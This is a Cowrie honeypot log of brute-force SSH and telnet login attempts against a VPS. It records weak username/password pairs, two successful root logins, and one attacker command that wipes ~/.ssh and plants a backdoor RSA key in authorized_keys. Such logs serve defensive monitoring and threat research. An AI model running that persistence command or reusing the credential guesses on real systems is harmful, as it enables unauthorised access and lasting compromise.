{"eventid":"cowrie.session.closed","duration":13.125783920288086,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:44.033611Z","src_ip":"202.107.95.221","session":"27e4f6066d3f"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":37889,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b14d56cab88","protocol":"telnet","message":"New connection: 202.107.95.221:37889 (1.2.3.4:23) [session: 2b14d56cab88]","sensor":"my-vps","timestamp":"2025-09-08T22:16:44.253660Z"}
{"eventid":"cowrie.session.closed","duration":12.741573095321655,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:48.986619Z","src_ip":"202.107.95.221","session":"5cd19d3365ba"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":38027,"dst_ip":"1.2.3.4","dst_port":23,"session":"e089dd874134","protocol":"telnet","message":"New connection: 202.107.95.221:38027 (1.2.3.4:23) [session: e089dd874134]","sensor":"my-vps","timestamp":"2025-09-08T22:16:49.163576Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40962,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c7c765369ba","protocol":"ssh","message":"New connection: 212.227.235.229:40962 (1.2.3.4:22) [session: 0c7c765369ba]","sensor":"my-vps","timestamp":"2025-09-08T22:16:50.141162Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:50.142093Z","src_ip":"212.227.235.229","session":"0c7c765369ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:50.453286Z","src_ip":"212.227.235.229","session":"0c7c765369ba"}
{"eventid":"cowrie.login.failed","username":"service","password":"123456","message":"login attempt [service/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T22:16:51.737912Z","src_ip":"212.227.235.229","session":"0c7c765369ba"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:53.051662Z","src_ip":"212.227.235.229","session":"0c7c765369ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39636,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2f8bfd0ae64","protocol":"ssh","message":"New connection: 212.227.235.229:39636 (1.2.3.4:22) [session: d2f8bfd0ae64]","sensor":"my-vps","timestamp":"2025-09-08T22:16:54.663050Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:16:54.664007Z","src_ip":"212.227.235.229","session":"d2f8bfd0ae64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:16:54.953868Z","src_ip":"212.227.235.229","session":"d2f8bfd0ae64"}
{"eventid":"cowrie.login.failed","username":"usertest","password":"1234567","message":"login attempt [usertest/1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T22:16:56.153300Z","src_ip":"212.227.235.229","session":"d2f8bfd0ae64"}
{"eventid":"cowrie.session.closed","duration":13.772968292236328,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:57.118940Z","src_ip":"202.107.95.221","session":"37c36e90cd61"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":38206,"dst_ip":"1.2.3.4","dst_port":23,"session":"0b61d55d452f","protocol":"telnet","message":"New connection: 202.107.95.221:38206 (1.2.3.4:23) [session: 0b61d55d452f]","sensor":"my-vps","timestamp":"2025-09-08T22:16:57.275152Z"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:57.444838Z","src_ip":"212.227.235.229","session":"d2f8bfd0ae64"}
{"eventid":"cowrie.session.closed","duration":13.644927263259888,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:16:57.898488Z","src_ip":"202.107.95.221","session":"2b14d56cab88"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":38211,"dst_ip":"1.2.3.4","dst_port":23,"session":"e8192dd0a521","protocol":"telnet","message":"New connection: 202.107.95.221:38211 (1.2.3.4:23) [session: e8192dd0a521]","sensor":"my-vps","timestamp":"2025-09-08T22:16:58.089779Z"}
{"eventid":"cowrie.session.closed","duration":12.737254858016968,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:01.900753Z","src_ip":"202.107.95.221","session":"e089dd874134"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":38234,"dst_ip":"1.2.3.4","dst_port":23,"session":"ebca5973ce76","protocol":"telnet","message":"New connection: 202.107.95.221:38234 (1.2.3.4:23) [session: ebca5973ce76]","sensor":"my-vps","timestamp":"2025-09-08T22:17:02.067327Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45484,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c324b40605e","protocol":"ssh","message":"New connection: 212.227.235.229:45484 (1.2.3.4:22) [session: 1c324b40605e]","sensor":"my-vps","timestamp":"2025-09-08T22:17:07.149819Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:07.398852Z","src_ip":"212.227.235.229","session":"1c324b40605e"}
{"eventid":"cowrie.session.closed","duration":12.791345596313477,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:10.881058Z","src_ip":"202.107.95.221","session":"e8192dd0a521"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":38411,"dst_ip":"1.2.3.4","dst_port":23,"session":"0bb79c2fba20","protocol":"telnet","message":"New connection: 202.107.95.221:38411 (1.2.3.4:23) [session: 0bb79c2fba20]","sensor":"my-vps","timestamp":"2025-09-08T22:17:11.054778Z"}
{"eventid":"cowrie.session.closed","duration":13.900447845458984,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:11.175531Z","src_ip":"202.107.95.221","session":"0b61d55d452f"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":38414,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b7ab832ee6c","protocol":"telnet","message":"New connection: 202.107.95.221:38414 (1.2.3.4:23) [session: 2b7ab832ee6c]","sensor":"my-vps","timestamp":"2025-09-08T22:17:11.340799Z"}
{"eventid":"cowrie.session.closed","duration":12.719635248184204,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:14.786853Z","src_ip":"202.107.95.221","session":"ebca5973ce76"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":38434,"dst_ip":"1.2.3.4","dst_port":23,"session":"b6f87df79cee","protocol":"telnet","message":"New connection: 202.107.95.221:38434 (1.2.3.4:23) [session: b6f87df79cee]","sensor":"my-vps","timestamp":"2025-09-08T22:17:14.976164Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50510,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c3081545590","protocol":"ssh","message":"New connection: 212.227.235.229:50510 (1.2.3.4:22) [session: 5c3081545590]","sensor":"my-vps","timestamp":"2025-09-08T22:17:15.941022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:17:15.968410Z","src_ip":"212.227.235.229","session":"5c3081545590"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:17:16.170813Z","src_ip":"212.227.235.229","session":"5c3081545590"}
{"eventid":"cowrie.login.failed","username":"hack","password":"1234567890","message":"login attempt [hack/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T22:17:17.075771Z","src_ip":"212.227.235.229","session":"5c3081545590"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:18.282979Z","src_ip":"212.227.235.229","session":"5c3081545590"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37128,"dst_ip":"1.2.3.4","dst_port":22,"session":"e00853b7f944","protocol":"ssh","message":"New connection: 212.227.235.229:37128 (1.2.3.4:22) [session: e00853b7f944]","sensor":"my-vps","timestamp":"2025-09-08T22:17:21.867161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:17:21.868814Z","src_ip":"212.227.235.229","session":"e00853b7f944"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:17:22.034417Z","src_ip":"212.227.235.229","session":"e00853b7f944"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58030,"dst_ip":"1.2.3.4","dst_port":22,"session":"1342e2553cde","protocol":"ssh","message":"New connection: 212.227.235.229:58030 (1.2.3.4:22) [session: 1342e2553cde]","sensor":"my-vps","timestamp":"2025-09-08T22:17:22.487227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:17:22.488342Z","src_ip":"212.227.235.229","session":"1342e2553cde"}
{"eventid":"cowrie.login.success","username":"root","password":"z1x3c5v7b9","message":"login attempt [root/z1x3c5v7b9] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:17:22.740754Z","src_ip":"212.227.235.229","session":"e00853b7f944"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:17:22.797235Z","src_ip":"212.227.235.229","session":"1342e2553cde"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:17:23.162872Z","src_ip":"212.227.235.229","session":"e00853b7f944"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:17:23.163582Z","src_ip":"212.227.235.229","session":"e00853b7f944"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:17:23.164551Z","src_ip":"212.227.235.229","session":"e00853b7f944"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:23.331370Z","src_ip":"212.227.235.229","session":"e00853b7f944"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:17:23.721451Z","src_ip":"212.227.235.229","session":"e00853b7f944"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:17:23.722158Z","src_ip":"212.227.235.229","session":"e00853b7f944"}
{"eventid":"cowrie.session.closed","duration":12.698381900787354,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:23.753043Z","src_ip":"202.107.95.221","session":"0bb79c2fba20"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:17:23.890094Z","src_ip":"212.227.235.229","session":"e00853b7f944"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:23.891021Z","src_ip":"212.227.235.229","session":"e00853b7f944"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36308,"dst_ip":"1.2.3.4","dst_port":22,"session":"967b9caf5dde","protocol":"ssh","message":"New connection: 212.227.235.229:36308 (1.2.3.4:22) [session: 967b9caf5dde]","sensor":"my-vps","timestamp":"2025-09-08T22:17:24.064821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:17:24.066224Z","src_ip":"212.227.235.229","session":"967b9caf5dde"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":38606,"dst_ip":"1.2.3.4","dst_port":23,"session":"b36bfa28ac25","protocol":"telnet","message":"New connection: 202.107.95.221:38606 (1.2.3.4:23) [session: b36bfa28ac25]","sensor":"my-vps","timestamp":"2025-09-08T22:17:24.070219Z"}
{"eventid":"cowrie.login.failed","username":"proxyuser","password":"12345","message":"login attempt [proxyuser/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:17:24.092407Z","src_ip":"212.227.235.229","session":"1342e2553cde"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:17:24.240192Z","src_ip":"212.227.235.229","session":"967b9caf5dde"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:17:24.939118Z","src_ip":"212.227.235.229","session":"967b9caf5dde"}
{"eventid":"cowrie.session.closed","duration":13.727250099182129,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:25.067962Z","src_ip":"202.107.95.221","session":"2b7ab832ee6c"}
{"eventid":"cowrie.session.connect","src_ip":"202.107.95.221","src_port":38615,"dst_ip":"1.2.3.4","dst_port":23,"session":"3d5e9fb9ae63","protocol":"telnet","message":"New connection: 202.107.95.221:38615 (1.2.3.4:23) [session: 3d5e9fb9ae63]","sensor":"my-vps","timestamp":"2025-09-08T22:17:25.251751Z"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:25.402525Z","src_ip":"212.227.235.229","session":"1342e2553cde"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:17:26.115954Z","src_ip":"212.227.235.229","session":"967b9caf5dde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36316,"dst_ip":"1.2.3.4","dst_port":22,"session":"81155d6a895c","protocol":"ssh","message":"New connection: 212.227.235.229:36316 (1.2.3.4:22) [session: 81155d6a895c]","sensor":"my-vps","timestamp":"2025-09-08T22:17:26.293866Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:17:26.294746Z","src_ip":"212.227.235.229","session":"81155d6a895c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:17:26.468426Z","src_ip":"212.227.235.229","session":"81155d6a895c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:17:27.205436Z","src_ip":"212.227.235.229","session":"81155d6a895c"}
